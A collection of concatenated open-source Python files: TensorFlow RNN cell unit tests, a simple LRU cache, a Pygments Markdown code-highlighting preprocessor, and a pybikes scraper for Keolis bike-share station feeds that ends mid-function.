0.759940, 0.759940, 0.720652, 0.720652, 0.778552, 0.778552,
0.941606, 0.941606, 0.781035, 0.781035, 0.977731, 0.977731]],
dtype=np.float32)
expected_state = np.array(
[[0.710660, 0.710660, 0.464130, 0.464130, 0.877293, 0.877293,
0.593283, 0.593283, 0.958505, 0.958505, 0.661638, 0.661638,
0.785405, 0.785405, 0.520789, 0.520789, 0.890836, 0.890836,
0.604341, 0.604341, 0.928512, 0.928512, 0.635773, 0.635773],
[0.967579, 0.967579, 0.669636, 0.669636, 1.038811, 1.038811,
0.736057, 0.736057, 1.058201, 1.058201, 0.755559, 0.755559,
0.993088, 0.993088, 0.692621, 0.692621, 1.040288, 1.040288,
0.737517, 0.737517, 1.048773, 1.048773, 0.745984, 0.745984],
[1.053842, 1.053842, 0.751109, 0.751109, 1.079919, 1.079919,
0.778357, 0.778357, 1.085620, 1.085620, 0.784530, 0.784530,
1.062455, 1.062455, 0.759940, 0.759940, 1.080101, 1.080101,
0.778552, 0.778552, 1.082402, 1.082402, 0.781035, 0.781035]],
dtype=np.float32)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.BidirectionalGridLSTMCell(
num_units=num_units, feature_size=feature_size,
share_time_frequency_weights=True,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts])
inputs = tf.constant(np.array([[1.0, 1.1, 1.2, 1.3],
[2.0, 2.1, 2.2, 2.3],
[3.0, 3.1, 3.2, 3.3]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts * 2))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units*num_shifts*4))
self.assertAllClose(res[0], expected_output)
# There should be num_shifts * 4 states in the tuple.
self.assertEqual(len(res[1]), num_shifts * 4)
# Checking the shape of each state to be batch_size * num_units
for ss in res[1]:
self.assertEqual(ss.shape[0], batch_size)
self.assertEqual(ss.shape[1], num_units)
self.assertAllClose(np.concatenate(res[1], axis=1), expected_state)
def testBidirectionGridLSTMCellWithSliceOffset(self):
with self.test_session() as sess:
num_units = 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
expected_output = np.array(
[[0.464130, 0.464130, 0.419165, 0.419165, 0.593283, 0.593283,
0.738350, 0.738350, 0.661638, 0.661638, 0.866774, 0.866774,
0.322645, 0.322645, 0.276068, 0.276068, 0.584654, 0.584654,
0.690292, 0.690292, 0.640446, 0.640446, 0.840071, 0.840071],
[0.669636, 0.669636, 0.628966, 0.628966, 0.736057, 0.736057,
0.895927, 0.895927, 0.755559, 0.755559, 0.954359, 0.954359,
0.493625, 0.493625, 0.449236, 0.449236, 0.730828, 0.730828,
0.865996, 0.865996, 0.749429, 0.749429, 0.944958, 0.944958],
[0.751109, 0.751109, 0.711716, 0.711716, 0.778357, 0.778357,
0.940779, 0.940779, 0.784530, 0.784530, 0.980604, 0.980604,
0.608587, 0.608587, 0.566683, 0.566683, 0.777345, 0.777345,
0.925820, 0.925820, 0.782597, 0.782597, 0.976858, 0.976858]],
dtype=np.float32)
expected_state = np.array(
[[0.710660, 0.710660, 0.464130, 0.464130, 0.877293, 0.877293,
0.593283, 0.593283, 0.958505, 0.958505, 0.661638, 0.661638,
0.516575, 0.516575, 0.322645, 0.322645, 0.866628, 0.866628,
0.584654, 0.584654, 0.934002, 0.934002, 0.640446, 0.640446],
[0.967579, 0.967579, 0.669636, 0.669636, 1.038811, 1.038811,
0.736057, 0.736057, 1.058201, 1.058201, 0.755559, 0.755559,
0.749836, 0.749836, 0.493625, 0.493625, 1.033488, 1.033488,
0.730828, 0.730828, 1.052186, 1.052186, 0.749429, 0.749429],
[1.053842, 1.053842, 0.751109, 0.751109, 1.079919, 1.079919,
0.778357, 0.778357, 1.085620, 1.085620, 0.784530, 0.784530,
0.895999, 0.895999, 0.608587, 0.608587, 1.078978, 1.078978,
0.777345, 0.777345, 1.083843, 1.083843, 0.782597, 0.782597]],
dtype=np.float32)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.BidirectionalGridLSTMCell(
num_units=num_units, feature_size=feature_size,
share_time_frequency_weights=True,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts],
backward_slice_offset=1)
inputs = tf.constant(np.array([[1.0, 1.1, 1.2, 1.3],
[2.0, 2.1, 2.2, 2.3],
[3.0, 3.1, 3.2, 3.3]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts * 2))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units*num_shifts*4))
self.assertAllClose(res[0], expected_output)
# There should be num_shifts * 4 states in the tuple.
self.assertEqual(len(res[1]), num_shifts * 4)
# Checking the shape of each state to be batch_size * num_units
for ss in res[1]:
self.assertEqual(ss.shape[0], batch_size)
self.assertEqual(ss.shape[1], num_units)
self.assertAllClose(np.concatenate(res[1], axis=1), expected_state)
def testAttentionCellWrapperFailures(self):
with self.assertRaisesRegexp(
TypeError, "The parameter cell is not RNNCell."):
tf.contrib.rnn.AttentionCellWrapper(None, 0)
num_units = 8
for state_is_tuple in [False, True]:
with tf.Graph().as_default():
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
with self.assertRaisesRegexp(
ValueError, "attn_length should be greater than zero, got 0"):
tf.contrib.rnn.AttentionCellWrapper(lstm_cell, 0,
state_is_tuple=state_is_tuple)
with self.assertRaisesRegexp(
ValueError, "attn_length should be greater than zero, got -1"):
tf.contrib.rnn.AttentionCellWrapper(lstm_cell, -1,
state_is_tuple=state_is_tuple)
with tf.Graph().as_default():
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=True)
with self.assertRaisesRegexp(
ValueError, "Cell returns tuple of states, but the flag "
"state_is_tuple is not set. State size is: *"):
tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, 4, state_is_tuple=False)
def testAttentionCellWrapperZeros(self):
num_units = 8
attn_length = 16
batch_size = 3
input_size = 4
for state_is_tuple in [False, True]:
with tf.Graph().as_default():
with self.test_session() as sess:
with tf.variable_scope("state_is_tuple_" + str(state_is_tuple)):
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
cell = tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, attn_length, state_is_tuple=state_is_tuple)
if state_is_tuple:
zeros = tf.zeros(
[batch_size, num_units], dtype=np.float32)
attn_state_zeros = tf.zeros(
[batch_size, attn_length * num_units], dtype=np.float32)
zero_state = ((zeros, zeros), zeros, attn_state_zeros)
else:
zero_state = tf.zeros(
[batch_size, num_units * 2 + attn_length
* num_units + num_units], dtype=np.float32)
inputs = tf.zeros([batch_size, input_size], dtype=tf.float32)
output, state = cell(inputs, zero_state)
self.assertEquals(output.get_shape(), [batch_size, num_units])
if state_is_tuple:
self.assertEquals(len(state), 3)
self.assertEquals(len(state[0]), 2)
self.assertEquals(state[0][0].get_shape(),
[batch_size, num_units])
self.assertEquals(state[0][1].get_shape(),
[batch_size, num_units])
self.assertEquals(state[1].get_shape(), [batch_size, num_units])
self.assertEquals(state[2].get_shape(),
[batch_size, attn_length * num_units])
tensors = [output] + list(state)
else:
self.assertEquals(
state.get_shape(), [batch_size, num_units * 2 + num_units
+ attn_length * num_units])
tensors = [output, state]
zero_result = sum([tf.reduce_sum(tf.abs(x)) for x in tensors])
sess.run(tf.initialize_all_variables())
self.assertTrue(sess.run(zero_result) < 1e-6)
def testAttentionCellWrapperValues(self):
num_units = 8
attn_length = 16
batch_size = 3
for state_is_tuple in [False, True]:
with tf.Graph().as_default():
with self.test_session() as sess:
with tf.variable_scope("state_is_tuple_" + str(state_is_tuple)):
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
cell = tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, attn_length, state_is_tuple=state_is_tuple)
if state_is_tuple:
zeros = tf.constant(
0.1 * np.ones([batch_size, num_units],
dtype=np.float32), dtype=tf.float32)
attn_state_zeros = tf.constant(
0.1 * np.ones([batch_size, attn_length * num_units],
dtype=np.float32), dtype=tf.float32)
zero_state = ((zeros, zeros), zeros, attn_state_zeros)
else:
zero_state = tf.constant(
0.1 * np.ones([batch_size, num_units * 2 + num_units
+ attn_length * num_units],
dtype=np.float32), dtype=tf.float32)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
output, state = cell(inputs, zero_state)
if state_is_tuple:
concat_state = tf.concat(
1, [state[0][0], state[0][1], state[1], state[2]])
else:
concat_state = state
sess.run(tf.initialize_all_variables())
output, state = sess.run([output, concat_state])
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((output[0, :] - output[i, :]))) > 1e-6)
self.assertTrue(
float(np.linalg.norm((state[0, :] - state[i, :]))) > 1e-6)
def testAttentionCellWrapperCorrectResult(self):
num_units = 4
attn_length = 6
batch_size = 2
expected_output = np.array(
[[-0.76951641, -0.77613342, 0.1882876, 0.4528169],
[-0.62173879, -0.53987527, 0.06999521, 0.43236512]], dtype=np.float32)
expected_state = np.array(
[[0.00686008, 0.32751927, 0.65842509, 0.13517606, 0.00341745,
0.21539585, 0.2087716, 0.04919484, 0.65901887, 0.71350443, 0.45989594,
0.32038051, 0.58086717, 0.49446869, 0.7641536, 0.12814975, 0.92231739,
0.89857256, 0.21889746, 0.38442063, 0.53481543, 0.8876909, 0.45823169,
0.5905602, 0.78038228, 0.56501579, 0.03971386, 0.09870267, 0.8074435,
0.66821432, 0.99211812, 0.12295902, -0.78066337, -0.55385113,
0.25296241, 0.29621673],
[-2.65422642e-01, 7.69232273e-01, 2.61641771e-01, 3.12298536e-03,
-1.54120743e-01, 4.68760282e-01, 9.73877981e-02, 9.45428968e-04,
7.77730405e-01, 6.53964162e-01, 4.54966187e-01, 4.93799955e-01,
7.30002642e-01, 6.69868946e-01, 7.35766888e-01, 8.63012671e-01,
8.78873706e-01, 3.51857543e-01, 9.34172153e-01, 6.47329569e-01,
6.31730437e-01, 6.66278243e-01, 5.36446571e-01, 2.04774857e-01,
9.84584212e-01, 3.82772446e-01, 3.74667645e-02, 9.25101876e-01,
5.77141643e-01, 8.49329710e-01, 3.61274123e-01, 1.21259212e-01,
-6.95882142e-01, -7.14576960e-01, 5.69079161e-01, 3.14788610e-01]],
dtype=np.float32)
seed = 12345
tf.set_random_seed(seed)
for state_is_tuple in [False, True]:
with tf.Session() as sess:
with tf.variable_scope("state_is_tuple", reuse=state_is_tuple):
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
cell = tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, attn_length, state_is_tuple=state_is_tuple)
zeros1 = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+1)
zeros2 = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+2)
zeros3 = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+3)
attn_state_zeros = tf.random_uniform(
(batch_size, attn_length * num_units), 0.0, 1.0, seed=seed+4)
zero_state = ((zeros1, zeros2), zeros3, attn_state_zeros)
if not state_is_tuple:
zero_state = tf.concat(1,
[zero_state[0][0], zero_state[0][1],
zero_state[1], zero_state[2]])
inputs = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+5)
output, state = cell(inputs, zero_state)
if state_is_tuple:
state = tf.concat(1, [state[0][0], state[0][1], state[1], state[2]])
sess.run(tf.initialize_all_variables())
self.assertAllClose(sess.run(output), expected_output)
self.assertAllClose(sess.run(state), expected_state)
class LayerNormBasicLSTMCellTest(tf.test.TestCase):
# NOTE: all the values in the current test case have been calculated.
def testBasicLSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
c0 = tf.zeros([1, 2])
h0 = tf.zeros([1, 2])
state0 = tf.nn.rnn_cell.LSTMStateTuple(c0, h0)
c1 = tf.zeros([1, 2])
h1 = tf.zeros([1, 2])
state1 = tf.nn.rnn_cell.LSTMStateTuple(c1, h1)
state = (state0, state1)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(2)
cell = tf.nn.rnn_cell.MultiRNNCell([cell] * 2)
g, out_m = cell(x, state)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m],
{
x.name: np.array([[1., 1.]]),
c0.name: 0.1 * np.asarray([[0, 1]]),
h0.name: 0.1 * np.asarray([[2, 3]]),
c1.name: 0.1 * np.asarray([[4, 5]]),
h1.name: 0.1 * np.asarray([[6, 7]]),
})
expected_h = np.array([[-0.38079708, 0.38079708]])
expected_state0_c = np.array([[-1.0, 1.0]])
expected_state0_h = np.array([[-0.38079708, 0.38079708]])
expected_state1_c = np.array([[-1.0, 1.0]])
expected_state1_h = np.array([[-0.38079708, 0.38079708]])
actual_h = res[0]
actual_state0_c = res[1][0].c
actual_state0_h = res[1][0].h
actual_state1_c = res[1][1].c
actual_state1_h = res[1][1].h
self.assertAllClose(actual_h, expected_h, 1e-5)
self.assertAllClose(expected_state0_c, actual_state0_c, 1e-5)
self.assertAllClose(expected_state0_h, actual_state0_h, 1e-5)
self.assertAllClose(expected_state1_c, actual_state1_c, 1e-5)
self.assertAllClose(expected_state1_h, actual_state1_h, 1e-5)
with tf.variable_scope("other", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3]) # Test BasicLSTMCell with input_size != num_units.
c = tf.zeros([1, 2])
h = tf.zeros([1, 2])
state = tf.nn.rnn_cell.LSTMStateTuple(c, h)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(2)
g, out_m = cell(x, state)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m],
{
x.name: np.array([[1., 1., 1.]]),
c.name: 0.1 * np.asarray([[0, 1]]),
h.name: 0.1 * np.asarray([[2, 3]]),
})
expected_h = np.array([[-0.38079708, 0.38079708]])
expected_c = np.array([[-1.0, 1.0]])
self.assertEqual(len(res), 2)
self.assertAllClose(res[0], expected_h, 1e-5)
self.assertAllClose(res[1].c, expected_c, 1e-5)
self.assertAllClose(res[1].h, expected_h, 1e-5)
def testBasicLSTMCellWithStateTuple(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
c0 = tf.zeros([1, 2])
h0 = tf.zeros([1, 2])
state0 = tf.nn.rnn_cell.LSTMStateTuple(c0, h0)
c1 = tf.zeros([1, 2])
h1 = tf.zeros([1, 2])
state1 = tf.nn.rnn_cell.LSTMStateTuple(c1, h1)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(2)
cell = tf.nn.rnn_cell.MultiRNNCell([cell] * 2)
h, (s0, s1) = cell(x, (state0, state1))
sess.run([tf.initialize_all_variables()])
res = sess.run([h, s0, s1],
{
x.name: np.array([[1., 1.]]),
c0.name: 0.1 * np.asarray([[0, 1]]),
h0.name: 0.1 * np.asarray([[2, 3]]),
c1.name: 0.1 * np.asarray([[4, 5]]),
h1.name: 0.1 * np.asarray([[6, 7]]),
})
expected_h = np.array([[-0.38079708, 0.38079708]])
expected_h0 = np.array([[-0.38079708, 0.38079708]])
expected_c0 = np.array([[-1.0, 1.0]])
expected_h1 = np.array([[-0.38079708, 0.38079708]])
expected_c1 = np.array([[-1.0, 1.0]])
self.assertEqual(len(res), 3)
self.assertAllClose(res[0], expected_h, 1e-5)
self.assertAllClose(res[1].c, expected_c0, 1e-5)
self.assertAllClose(res[1].h, expected_h0, 1e-5)
self.assertAllClose(res[2].c, expected_c1, 1e-5)
self.assertAllClose(res[2].h, expected_h1, 1e-5)
def testBasicLSTMCellWithDropout(self):
def _is_close(x, y, digits=4):
delta = x - y
return delta < 10 ** (-digits)
def _is_close_in(x, items, digits=4):
for i in items:
if _is_close(x, i, digits):
return True
return False
keep_prob = 0.5
c_high = 2.9998924946
c_low = 0.999983298578
h_low = 0.761552567265
h_high = 0.995008519604
num_units = 5
allowed_low = [2, 3]
with self.test_session() as sess:
with tf.variable_scope("other", initializer=tf.constant_initializer(1)):
x = tf.zeros([1, 5])
c = tf.zeros([1, 5])
h = tf.zeros([1, 5])
state = tf.nn.rnn_cell.LSTMStateTuple(c, h)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(
num_units, layer_norm=False, dropout_keep_prob=keep_prob)
g, s = cell(x, state)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, s],
{
x.name: np.ones([1, 5]),
c.name: np.ones([1, 5]),
h.name: np.ones([1, 5]),
})
# Since the returned tensors are of size [1,n]
# get the first component right now.
actual_h = res[0][0]
actual_state_c = res[1].c[0]
actual_state_h = res[1].h[0]
# For each item in `c` (the cell inner state) check that
# it is equal to one of the allowed values `c_high` (not
# dropped out) or `c_low` (dropped out) and verify that the
# corresponding item in `h` (the cell activation) is coherent.
# Count the dropped activations and check that their number is
# coherent with the dropout probability.
dropped_count = 0
self.assertTrue((actual_h == actual_state_h).all())
for citem, hitem in zip(actual_state_c, actual_state_h):
self.assertTrue(_is_close_in(citem, [c_low, c_high]))
if _is_close(citem, c_low):
self.assertTrue(_is_close(hitem, h_low))
dropped_count += 1
elif _is_close(citem, c_high):
self.assertTrue(_is_close(hitem, h_high))
self.assertIn(dropped_count, allowed_low)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -455,738,782,028,795,970 | 46.887967 | 80 | 0.549548 | false |
gburd/dbsql | src/py/misc/lru.py | 1 | 5206 | #-*- coding: ISO-8859-1 -*-
#
# DBSQL - A SQL database engine.
#
# Copyright (C) 2007-2008 The DBSQL Group, Inc. - All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# There are special exceptions to the terms and conditions of the GPL as it
# is applied to this software. View the full text of the exception in file
# LICENSE_EXCEPTIONS in the directory of this software distribution.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# http://creativecommons.org/licenses/GPL/2.0/
#
# Copyright (C) 2004 Gerhard Häring <[email protected]>
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
#
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
#
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
# A simple LRU cache, which will be rewritten in C later
class Node:
def __init__(self, key, data):
self.key = key
self.data = data
self.count = 1
self.prev, self.next = None, None
class Cache:
def __init__(self, factory, maxlen):
self.first, self.last = None, None
self.maxlen = maxlen
self.mapping = {}
self.factory = factory
def get(self, key):
if key in self.mapping:
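            # Cache hit: bump the node's hit count and, if it now outranks the
            # nodes in front of it, move it forward so the list stays ordered
            # by descending count (most frequently used first).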
nd = self.mapping[key]
nd.count += 1
if nd.prev and nd.count > nd.prev.count:
ptr = nd.prev
while ptr.prev is not None and nd.count > ptr.prev.count:
ptr = ptr.prev
# Move nd before ptr
if nd.next:
nd.next.prev = nd.prev
else:
self.last = nd.prev
if nd.prev:
nd.prev.next = nd.next
if ptr.prev:
ptr.prev.next = nd
else:
self.first = nd
save = nd.next
nd.next = ptr
nd.prev = ptr.prev
if nd.prev is None:
self.first = nd
ptr.prev = nd
#ptr.next = save
else:
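            # Cache miss: evict the tail node (lowest count) when the cache is
            # full, then build the value with the factory and append it as the
            # new tail.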
if len(self.mapping) == self.maxlen:
if self.last:
nd = self.last
self.mapping[self.last.key] = None
del self.mapping[self.last.key]
if nd.prev:
nd.prev.next = None
self.last = nd.prev
nd.prev = None
obj = self.factory(key)
nd = Node(key, obj)
nd.prev = self.last
nd.next = None
if self.last:
self.last.next = nd
else:
self.first = nd
self.last = nd
self.mapping[key] = nd
return nd.data
def display(self):
nd = self.first
while nd:
prevkey, nextkey = None, None
if nd.prev: prevkey = nd.prev.key
if nd.next: nextkey = nd.next.key
print "%4s <- %4s -> %s\t(%i)" % (prevkey, nd.key, nextkey, nd.count)
nd = nd.next
if __name__ == "__main__":
def create(s):
return s
import random
cache = Cache(create, 5)
if 1:
chars = list("abcdefghijklmnopqrstuvwxyz")
lst = []
for i in range(100):
idx = random.randint(0, len(chars) - 1)
what = chars[idx]
lst.append(what)
cache.get(chars[idx])
cache.display()
#print "-" * 50
#print lst
#print "-" * 50
else:
lst = \
['y', 'y', 'b', 'v', 'x', 'f', 'h', 'n', 'g', 'k', 'o', 'q', 'p', 'e', 'm', 'c', 't', 'y', 'c', 's', 'p', 's', 'j', 'm', \
'u', 'f', 'z', 'x', 'v', 'r', 'w', 'e', 'm', 'd', 'w', 's', 'b', 'r', 'd', 'e', 'h', 'g', 'e', 't', 'p', 'b', 'e', 'i', \
'g', 'n']
#lst = ['c', 'c', 'b', 'b', 'd', 'd', 'g', 'c', 'c', 'd']
for item in lst:
cache.get(item)
cache.display()
| gpl-3.0 | -7,226,144,713,881,507,000 | 33.657534 | 134 | 0.516135 | false |
emineKoc/WiseWit | wisewit_front_end/node_modules/pygmentize-bundled/vendor/pygments/external/markdown-processor.py | 42 | 2041 | # -*- coding: utf-8 -*-
"""
The Pygments Markdown Preprocessor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This fragment is a Markdown_ preprocessor that renders source code
to HTML via Pygments. To use it, invoke Markdown like so::
import markdown
html = markdown.markdown(someText, extensions=[CodeBlockExtension()])
This uses CSS classes by default, so use
``pygmentize -S <some style> -f html > pygments.css``
to create a stylesheet to be added to the website.
You can then highlight source code in your markdown markup::
[sourcecode:lexer]
some code
[/sourcecode]
.. _Markdown: https://pypi.python.org/pypi/Markdown
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
# Options
# ~~~~~~~
# Set to True if you want inline CSS styles instead of classes
INLINESTYLES = False
import re
from markdown.preprocessors import Preprocessor
from markdown.extensions import Extension
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import get_lexer_by_name, TextLexer
class CodeBlockPreprocessor(Preprocessor):
pattern = re.compile(r'\[sourcecode:(.+?)\](.+?)\[/sourcecode\]', re.S)
formatter = HtmlFormatter(noclasses=INLINESTYLES)
def run(self, lines):
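        # Replace every [sourcecode:lexer] ... [/sourcecode] block with
        # Pygments-highlighted HTML; newlines are turned into <br /> so that
        # Markdown leaves the highlighted markup alone.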
def repl(m):
try:
lexer = get_lexer_by_name(m.group(1))
except ValueError:
lexer = TextLexer()
code = highlight(m.group(2), lexer, self.formatter)
code = code.replace('\n\n', '\n \n').replace('\n', '<br />')
return '\n\n<div class="code">%s</div>\n\n' % code
joined_lines = "\n".join(lines)
joined_lines = self.pattern.sub(repl, joined_lines)
return joined_lines.split("\n")
class CodeBlockExtension(Extension):
def extendMarkdown(self, md, md_globals):
md.preprocessors.add('CodeBlockPreprocessor', CodeBlockPreprocessor(), '_begin')
| gpl-3.0 | -4,268,316,988,149,691,400 | 29.462687 | 88 | 0.644292 | false |
BenSto/pybikes | pybikes/keolis.py | 1 | 8806 | # -*- coding: utf-8 -*-
# Copyright (C) 2010-2012, eskerda <[email protected]>
# Distributed under the AGPL license, see LICENSE.txt
import re
import json
from lxml import etree
import lxml.html
from .base import BikeShareSystem, BikeShareStation
from . import utils
xml_parser = etree.XMLParser(recover = True)
_re_float = "([+-]?\\d*\\.\\d+)(?![-+0-9\\.])"
class Keolis(BikeShareSystem):
sync = True
meta = {
'system': 'Keolis',
'company': ['Keolis']
}
_re_fuzzle = '\"latitude\"\:\ \"{0}\"\,\ '\
'\"longitude\"\:\ \"{0}\"\,\ '\
'\"text\"\:\ \"(.*?)\"\,\ '\
'\"markername'.format(_re_float)
_re_num_name = "\#(\d+)\ \-\ (.*)" # #10 - Place Lyautey
def __init__(self, tag, meta, feed_url):
super(Keolis, self).__init__(tag, meta)
self.feed_url = feed_url
def update(self, scraper = None):
if scraper is None:
scraper = utils.PyBikesScraper()
raw_fuzzle = scraper.request(self.feed_url)
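        # The feed embeds the stations as escaped JSON-like markup; the regex
        # pulls out (latitude, longitude, popup HTML) triples, one per station.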
data = re.findall(Keolis._re_fuzzle, raw_fuzzle)
self.stations = map(KeolisStation, data)
class KeolisStation(BikeShareStation):
def __init__(self, data):
"""
        fuzzle is a utf8-encoded, string-escaped HTML snippet like:
<div class="gmap-popup">
<div class="gmap-infobulle">
<div class="gmap-titre">#16 - Universite Sud</div>
<div class="gmap-adresse">
AVENUE DE L'UNIVERSITE FACE A L'ENTREE DE L'UNIVERSITE
</div>
<div class="gmap-velos">
<table>
<tr>
<td class="ok">
<strong>9</strong> vélos disponibles
</td>
<td class="ok">
<strong>17</strong> places disponibles
</td>
<td>
<acronym title="Carte Bancaire">CB</acronym>
</td>
</tr>
</table>
</div>
<div class="gmap-datemaj">
dernière mise à jour il y a <strong>00 min</strong>
</div>
</div>
</div>
"""
super(KeolisStation, self).__init__()
fuzzle = lxml.html.fromstring(
data[2].encode('utf8').decode('string-escape')
)
num_name = re.findall(
Keolis._re_num_name,
fuzzle.xpath('//div[@class="gmap-titre"]/text()')[0]
)[0]
bikes_places_upd = fuzzle.xpath('//strong/text()')
# Will not use
# address = fuzzle.xpath('//div[@class="gmap-adresse"]/text()')[0]
self.latitude = float(data[0])
self.longitude = float(data[1])
self.name = num_name[1]
self.extra = {
'uid': int(num_name[0])
}
if len(bikes_places_upd) > 1:
self.bikes = int(bikes_places_upd[0])
self.free = int(bikes_places_upd[1])
self.extra['status'] = 'online'
else:
self.bikes = 0
self.free = 0
self.extra['status'] = 'offline'
class Keolis_v2(BikeShareSystem):
sync = False
meta = {
'system': 'Keolis',
'company': ['Keolis']
}
_list_url = '/stations/xml-stations.aspx'
_station_url = '/stations/xml-station.aspx?borne={id}'
def __init__(self, tag, feed_url, meta):
super(Keolis_v2, self).__init__(tag, meta)
self.feed_url = feed_url + self._list_url
self.station_url = feed_url + self._station_url
def update(self, scraper = None):
if scraper is None:
scraper = utils.PyBikesScraper()
raw_list = scraper.request(self.feed_url).encode('utf-16')
xml_list = etree.fromstring(raw_list, xml_parser)
stations = []
for index, marker in enumerate(xml_list.iter('marker')):
station = KeolisStation_v2(marker, self.station_url)
stations.append(station)
self.stations = stations
class KeolisStation_v2(BikeShareStation):
def __init__(self, marker, station_url):
super(KeolisStation_v2, self).__init__()
self.name = marker.get('name')
self.latitude = float(marker.get('lat'))
self.longitude = float(marker.get('lng'))
self.extra = {
'uid': int(marker.get('id'))
}
self._station_url = station_url.format(id = self.extra['uid'])
def update(self, scraper = None):
if scraper is None:
scraper = utils.PyBikesScraper()
raw_status = scraper.request(self._station_url).encode('utf-16')
xml_status = etree.fromstring(raw_status, xml_parser)
self.bikes = int(xml_status.find('bikes').text)
self.free = int(xml_status.find('attachs').text)
self.extra['address'] = xml_status.find('adress').text.title()
        # TODO: Try to standardize these fields
# 0 means online, 1 means temporarily unavailable
# are there more status?
self.extra['status'] = xml_status.find('status').text
# payment: AVEC_TPE | SANS_TPE
# as in, accepts bank cards or not
self.extra['payment'] = xml_status.find('paiement').text
# Update time as in 47 seconds ago: '47 secondes'
self.extra['lastupd'] = xml_status.find('lastupd').text
class KeolisSTAR(BikeShareSystem):
meta = {
'system': 'Keolis',
'company': ['Keolis'],
}
# Rows: -1 gives us all the results without the need to paginate
BASE_URL = "https://data.explore.star.fr/api/records/1.0/search/?dataset={dataset}&rows=-1" # NOQA
def __init__(self, tag, dataset, meta):
super(KeolisSTAR, self).__init__(tag, meta)
self.feed_url = KeolisSTAR.BASE_URL.format(dataset=dataset)
self.meta['source'] = self.meta['source'].format(dataset=dataset)
def update(self, scraper=None):
scraper = scraper or utils.PyBikesScraper()
data = json.loads(scraper.request(self.feed_url))
records = map(lambda r: r['fields'], data['records'])
self.stations = map(KeolisSTARStation, records)
class KeolisSTARStation(BikeShareStation):
def __init__(self, fields):
name = fields['nom']
latitude, longitude = map(float, fields['coordonnees'])
bikes = int(fields['nombrevelosdisponibles'])
free = int(fields['nombreemplacementsdisponibles'])
extra = {
'slots': fields['nombreemplacementsactuels'],
'status': fields['etat'],
'uid': str(fields['idstation']),
'last_update': fields['lastupdate'],
'online': fields['etat'] == 'En fonctionnement'
}
super(KeolisSTARStation, self).__init__(name, latitude, longitude,
bikes, free, extra)
class VCub(BikeShareSystem):
meta = {
'system': 'Keolis',
'company': ['Keolis'],
}
def __init__(self, tag, meta, feed_url):
super(VCub, self).__init__(tag, meta)
self.feed_url = feed_url
def update(self, scraper=None):
scraper = scraper or utils.PyBikesScraper()
data = json.loads(scraper.request(self.feed_url))
